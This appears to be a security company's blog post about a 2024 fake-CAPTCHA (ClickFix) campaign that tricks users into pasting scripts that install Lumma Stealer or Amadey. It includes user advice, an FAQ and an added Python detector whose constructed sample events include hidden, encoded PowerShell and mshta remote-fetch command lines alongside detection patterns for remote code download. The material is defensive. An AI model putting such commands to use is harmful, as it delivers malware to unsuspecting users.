You’re probably used to seeing CAPTCHAs (Completely Automated Public Turing Test to Tell Computers and Humans Apart) when websites ask you to “prove you’re not a robot” by clicking on images or typing words.
However, cybercriminals are now creating fake CAPTCHAs that look just like the real thing. When you interact with these fake CAPTCHAs, they can secretly install malware on your computer without you realizing it.
This trend has been growing. Here is how security researchers uncovered this campaign, which ran from August to October 2024.
How Fake CAPTCHAs Are Used In Malware Attacks
In August 2024, Palo Alto Networks’ Unit 42 found fake verification pages being used to spread the Lumma Stealer malware. McAfee Labs corroborated this finding when they observed attackers using the ClickFix infection chain. This campaign dupes users into clicking buttons labeled “Verify you are a human” or “I am not a robot.”
When they click, a harmful script is copied to their clipboard. The user is then misled into pressing the Windows key + R (which opens the Run dialog in Windows) and pasting the script there, which installs the malware without the user realizing it.
According to McAfee, this attack uses two main lures to bring victims to the fake CAPTCHA pages:
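The Run-dialog step described above leaves a trace defenders can look for: a script interpreter whose parent process is explorer.exe, started with a command line a person rarely types by hand. The Python below is an added example, not code from this article or from McAfee, Kaspersky or Unit 42; the key=value log format, the sample events, the interpreter list and the indicator patterns are all constructed assumptions to tune against your own telemetry.

```python
"""Heuristic detection for ClickFix-style executions: a script interpreter
launched from the Run dialog (parent explorer.exe) whose command line hides
its window, carries an encoded command, or fetches from a remote URL.
Added example for this article; not code from McAfee, Kaspersky or Unit 42.
The key=value log format and every sample line below are constructed."""
import re

# Constructed process-creation records (Sysmon-like fields, one event per line).
SAMPLE_EVENTS = [
    r"Parent=C:\Windows\explorer.exe Image=C:\Windows\System32\notepad.exe CommandLine=notepad.exe",
    r"Parent=C:\Windows\explorer.exe Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "
    r"CommandLine=powershell -w hidden -enc <BASE64_PLACEHOLDER>",
    r"Parent=C:\Windows\explorer.exe Image=C:\Windows\System32\mshta.exe CommandLine=mshta https://example.invalid/captcha",
    r"Parent=C:\Windows\System32\cmd.exe Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "
    r"CommandLine=powershell -w hidden -File C:\build\deploy.ps1",
    r"Parent=C:\Windows\explorer.exe Image=C:\Windows\System32\cmd.exe CommandLine=cmd /c ipconfig /all",
]

EVENT_RE = re.compile(r"^Parent=(?P<parent>\S+) Image=(?P<image>\S+) CommandLine=(?P<cmd>.*)$")
# Interpreters a pasted one-liner typically runs through (assumed list; extend for your environment).
INTERPRETERS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "wscript.exe", "cscript.exe"}
# Command-line traits that are rare for a human typing into Run but common in pasted payloads.
INDICATORS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "encoded_command": re.compile(r"-e(?:c|nc?|ncodedcommand)?\s", re.I),
    "remote_fetch": re.compile(r"https?://|downloadstring|invoke-expression|\biex\b", re.I),
}

def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()

def classify(line: str):
    """Return None if the line does not parse, else the list of indicators hit
    (empty when the process is not an interpreter started from explorer.exe,
    or when the command line shows none of the traits)."""
    m = EVENT_RE.match(line)
    if m is None:
        return None
    if basename(m["parent"]) != "explorer.exe" or basename(m["image"]) not in INTERPRETERS:
        return []
    return [name for name, rx in INDICATORS.items() if rx.search(m["cmd"])]

def find_clickfix_candidates(lines):
    """(line number, interpreter, indicators) for every event worth an analyst's look."""
    findings = []
    for n, line in enumerate(lines, 1):
        hits = classify(line)
        if hits:
            findings.append((n, basename(EVENT_RE.match(line)["image"]), hits))
    return findings

if __name__ == "__main__":
    for n, image, hits in find_clickfix_candidates(SAMPLE_EVENTS):
        print(f"event {n}: {image} launched from Run dialog with {', '.join(hits)}")
```

Parent explorer.exe also covers double-clicked shortcuts and files, so the interpreter-plus-indicator combination is what keeps the rule from flagging everyday use.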
- Cracked Game Downloads: Users trying to download pirated games are redirected to these malicious CAPTCHA pages.
- Phishing Emails: Attackers send fake emails, often to GitHub contributors, about a supposed “security vulnerability.” These emails link to the same fake CAPTCHA pages, making it easy for the malware to spread.
However, according to the Kaspersky report, the fake CAPTCHA pages don’t only spread Lumma Stealer malware; they also distribute the Amadey Trojan.
Kaspersky noted that the ad network pushing these fake CAPTCHAs combines legitimate ads with malicious ones.
Here’s how it works: clicking anywhere on a page that uses this ad network may send you to other sites. Most of these redirects are harmless, leading to ads for security software or ad blockers. But sometimes the redirect lands on a fake CAPTCHA page. Unlike a real CAPTCHA, which blocks bots, this fake one exists to push visitors toward shady sites. You won’t always end up with malware, though; sometimes you are simply directed to a betting site via a QR code.
Users in Brazil, Spain, Italy, and Russia were targeted the most in this campaign.
How To Recognize A Fake CAPTCHA & Protect Your Devices
Between September 22 and October 14, 2024, more than 140,000 users encountered ad scripts. Kaspersky’s data shows that over 20,000 of these users were redirected to infected sites, where some saw a fake update notice or a fake CAPTCHA.
Here’s how to recognize a fake CAPTCHA and keep your devices secure:
1. If A CAPTCHA Appears Unexpectedly
A CAPTCHA should usually appear only on trusted websites, and only when there’s a valid reason to verify that you’re human. Fake CAPTCHAs often look slightly off: unusual text, odd design, or urgent wording that pushes you to click quickly.
2. If A CAPTCHA Or Alert Asks You To Download Something Or Copy & Paste A Command
Avoid it! Real CAPTCHAs never ask you to take these actions. Malware attacks often work by getting you to download a file or paste a script, which then infects your device.
3. If You See CAPTCHAs On These Types Of Sites
Many fake CAPTCHAs pop up on sites that offer free downloads, like cracked games, free movies, or other pirated content. They also show up on some adult sites, file-sharing platforms, and betting websites.
4. If You Accidentally Click On A Fake CAPTCHA
Reliable security software can catch these fake CAPTCHAs and block dangerous sites. Anti-malware tools can protect you if you accidentally click on a fake CAPTCHA or download something malicious.
5. If You See An Update Message That Looks Suspicious
Don’t click it! Attackers sometimes display fake update messages for your browser or other software. Genuine updates don’t appear at random; they usually come from within the app or software itself, not as pop-up windows on unrelated websites.
Taking a few extra seconds to question suspicious CAPTCHAs can protect your device and your information.
FAQ
What Are CAPTCHAs Really Used For?
CAPTCHAs are used to make sure you’re a real person and not a bot. They help protect websites from spam and automated attacks by asking you to complete simple tasks, like identifying pictures or typing words. This keeps the site safe and ensures only humans can access certain features.
Who Is Responsible For The Fake CAPTCHA Malware Attacks?
Researchers have not yet identified the specific group responsible for the fake CAPTCHA malware attacks. These attacks are part of a campaign in which cybercriminals trick users into executing malicious scripts by disguising them as CAPTCHA verification steps. The campaign primarily spreads through fake CAPTCHA pages linked to cracked software downloads and phishing emails.
How To Protect Yourself From Malware Attacks Using Fake CAPTCHAs?
Be cautious when prompted to click or download anything from unfamiliar websites. Always double-check the legitimacy of CAPTCHA requests, especially on sites where they’re unexpected. 2Secure Corp can help businesses by offering real-time monitoring, web application security, and advanced protection to stop malware before it reaches your devices.
Sources:
- McAfee Labs. (2024, September 20). Behind the CAPTCHA: A Clever Gateway of Malware. McAfee Blog. https://www.mcafee.com/blogs/other-blogs/mcafee-labs/behind-the-captcha-a-clever-gateway-of-malware/
- Kolesnikov, V. (2024, October 29). Lumma/Amadey: fake CAPTCHAs want to know if you’re human. Securelist (Kaspersky). https://securelist.com/fake-captcha-delivers-lumma-amadey/114312/
- Palo Alto Networks Unit 42. (2024, August 28). 2024-08-28-IOCs-for-Lumman-Stealer-from-fake-human-captcha-copy-paste-script.txt. GitHub, Unit42-timely-threat-intel repository. https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2024-08-28-IOCs-for-Lumman-Stealer-from-fake-human-captcha-copy-paste-script.txt